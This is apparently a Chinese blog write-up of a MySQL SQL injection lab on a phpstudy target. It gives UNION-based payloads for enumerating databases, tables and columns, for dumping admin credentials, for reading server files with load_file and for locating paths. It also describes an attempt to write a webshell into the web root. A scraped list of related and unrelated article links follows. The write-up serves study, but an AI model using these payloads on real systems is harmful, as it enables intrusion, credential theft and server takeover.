大哥带我们的mysql注入
这是今天的任务
union select ,,,,
查询语句 第一步是先构造闭合 加入单引号报错 然后 更据and 1=1 and1=2看是字符型还是布尔型注入
http://www.萨达所大大所多t/index.php?id=1%20order%20by%205
数据库test
查询所有数据库
网址+union select 1,2,3,4,schema_name from information_schema.schemata
要求是读取web端口的admin密码 那我们应该进入test数据库
爆表名
网站+union select ,,,,table_name from information_schema.tables where table_schema='test'
这里原来的语句已经闭合 不需要你去闭合了
看见有admin表之后继续爆列名
union select ,,,,column_name from information_schema.columns where table_name='admin'
看见有username 和password应该就是我们要爆破的字段名 来爆破吧
网站+union select username,password,,, from admin
这个应该就是我们要爆破的数据 admin admin888
0X02读取靶机phpstudy里面mysql的my.ini这个文件
那有注入点 我们看看是否有读写文件的权限呐? 因为这里的user()是root那我们就有读取文件的权限了
1、必须有权限读取并且文件必须完全可读。
and (select count(*) from mysql.user)>0 /*如果结果返回正常,说明具有读写权限.*/
and (select count(*) from mysql.user)>0 /* 返回错误,应该是管理员给数据库账户降权了*/
2、欲读取文件必须在服务器上
3、必须指定文件完整的路径
4、欲读取文件必须小于max_allowed_packet
如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限。
在windows下,如果NTFS设置得当,是不能读取相关的文件的,当遇到administrators才能访问的文件,
users就不能实现用load_file读取文件了。
利用需要满足以下条件:
- 1. root权限
- 2. GPC关闭(能使用单引号)
- 3. 有绝对路径(读文件可以不用,写文件必须)
- 4. 没有配置—secure-file-priv
那么权限够了 路径怎么办呐??????
两个函数的介绍
@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径
union select user(),,,@@datadir,@@basedir
好像找到路径了E:\phpstudy\MySQL\data\ 那我们看看mysql的my.ini文件一般在哪个文件夹下面 去百度一下
这里分享这个
https://blog.csdn.net/jiangyu1013/article/details/79792708
那更据他的理解路径应该是 E:\phpstudy\MySQL\data\my.ini
那我们就具备读文件的权限了
构造语句 这里第一次构造的路径是\一个斜杠的 不知道为什么不行 网上说两个斜杠就好 我就去试了一下
网址+%20union%20select%20load_file(%27E:\\phpstudy\\MySQL\\my.ini%),,,,
成功读取文件
0X03写入自己的webshell
那么这个要满足的条件就更多了
没有配置—secure-file-priv 这个是什么东西呐?看看下面这个博客
https://blog.csdn.net/qq_41173457/article/details/81264564
好咯 回归正题
尝试一下嘛先 管他配没配置 但是一般这个网页的路径在哪里呐?
我们只是知道mysql的路径的啊 提示告诉我们是phpstudy 我们看看自己的phpstudy mysql和WWW同目录
那我们来尝试一下吧
我的天 过滤了 那我们尝试一下16进制直接写入吧
而且好像还把目录报错出来了
我们的目录写错了应该是E:\phpstudy\WWW\sqli-one\
但是还是会报错
https://blog.csdn.net/qianduan520/article/details/52383214
这篇文章给大家解释的很清楚了
跟着改就行
然后就会成功
致谢--- 卿哥
加油努力!!!
大哥带我们的mysql注入的更多相关文章
- 大哥带我们的mysql注入 基于时间的盲注
?id= and ,,sleep()) ?id= and ,,sleep()) if语句/if()函数 在基于时间型SQL盲注中,我们经常使用条件语句来判断我们的操作是否正确: ?id= and = ...
- 大哥带我们的mysql注入 基于bool的盲注
盲注 那么我们来了解一点盲注的语法 这里面是语法的介绍 https://blog.csdn.net/alex_seo/article/details/82148955 0X01第一步我们先判断当前数据 ...
- [转载] MySQL 注入攻击与防御
MySQL 注入攻击与防御 2017-04-21 16:19:3454921次阅读0 作者:rootclay 预估稿费:500RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页 ...
- 对MYSQL注入相关内容及部分Trick的归类小结
前言 最近在给学校的社团成员进行web安全方面的培训,由于在mysql注入这一块知识点挺杂的,入门容易,精通较难,网上相对比较全的资料也比较少,大多都是一个比较散的知识点,所以我打算将我在学习过程中遇 ...
- Mysql注入汇总!!!!!!!!!
师傅tpl!!!!! https://xz.aliyun.com/t/7169[对MYSQL注入相关内容及部分Trick的归类小结] https://www.jianshu.com/p/f261125 ...
- 十三:SQL注入之MYSQL注入
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作,其中也会遇到很多的阻碍,相关防御手法也要明确,所谓知己知彼,百战不殆.作为安全开发工作者,攻 ...
- Zabbix-agent使用自带模板监控 MySQL
1.rpm -ivh http://repo.zabbix.com/zabbix/2.4/rhel/6/x86_64/zabbix-release-2.4-1.el6.noarch.rpm 2.yum ...
- MySQL注入与防御(排版清晰内容有条理)
为何我要在题目中明确排版清晰以及内容有条理呢? 因为我在搜相关SQL注入的随笔博客的时候,看到好多好多都是页面超级混乱的.亲爱的园友们,日后不管写博客文章还是平时写的各类文章也要多个心眼,好好注意一下 ...
- Mysql注入小tips --持续更新中
学习Web安全好几年了,接触最多的是Sql注入,一直最不熟悉的也是Sql注入.OWASP中,Sql注入危害绝对是Top1.花了一点时间研究了下Mysql类型的注入. 文章中的tips将会持续更新,先说 ...
随机推荐
- 死磕并发之CountDownLatch解析
CountDownLatch解析 CountDownLatch是什么 CountDownLatch是基于AQS的阻塞工具,阻塞一个或者多个线程,直到所有的线程都执行完成. CountDownLatch ...
- Java细节----method和function的区别
面向对象的语言叫方法 面向过程的语言叫函数 在java中没有函数这么一说,只有方法一说.属于概念上的区别. 硬要说区别. Method必须依赖于Object. Function 是独立的,不需要依赖于 ...
- 利用Kruskal算法求最小生成树解决聪明的猴子问题 -- 数据结构
题目:聪明的猴子 链接:https://ac.nowcoder.com/acm/problem/19964 在一个热带雨林中生存着一群猴子,它们以树上的果子为生.昨天下了一场大雨,现在雨过天晴,但整个 ...
- IDEA Maven项目 pom.xml 找不到 Dependency 依赖
转载: IDEA Maven项目 pom.xml 找不到 Dependency 依赖 如果你的pom.xml中使用了dependencyManagement管理依赖并且添加了你本地仓库中不存在的依赖可 ...
- Comet OJ - Contest #13 「火鼠的皮衣 -不焦躁的内心-」
来源:Comet OJ - Contest #13 芝士相关: 复平面在信息学奥赛中的应用[雾 其实是道 sb 题??? 发现原式貌似十分可二项式定理,然后发现确实如此 我们把 \(a^i\) 替换成 ...
- CentOS 设置 yum源
什么是 yum Yum(全称 Yellow Dog Updater)是一个在 Fedora 和 RedHat 以及 CentOS 中的 Shell 前端软件包管理器.基于 RPM 包管理,能够从指定的 ...
- js 学习二 字符串常用方法
1.字符串长度 string.length var browserType = 'mozilla'; browserType.length; //7 2在字符串中查找子字符串 string.index ...
- window环境下,php+sphinx+coreseek实现简单的中文全文搜索
就以我个人理解来说,sphinx其实是介于客户端和mysql之间的一个索引表,把数据库的没一条记录假设为文档,那么这个索引表其实保存的就是这条记录的关键词及其对应的文档id 1.sphinx的安装 下 ...
- pyinstaller打包总结
建立py打包文件 if __name__ == '__main__': from PyInstaller.__main__ import run #opts=['music.py','--path=C ...
- 一、core 启动设置文件中的错误(启动文件不存在)
一.启动文件不存在 查看 别人的 原因是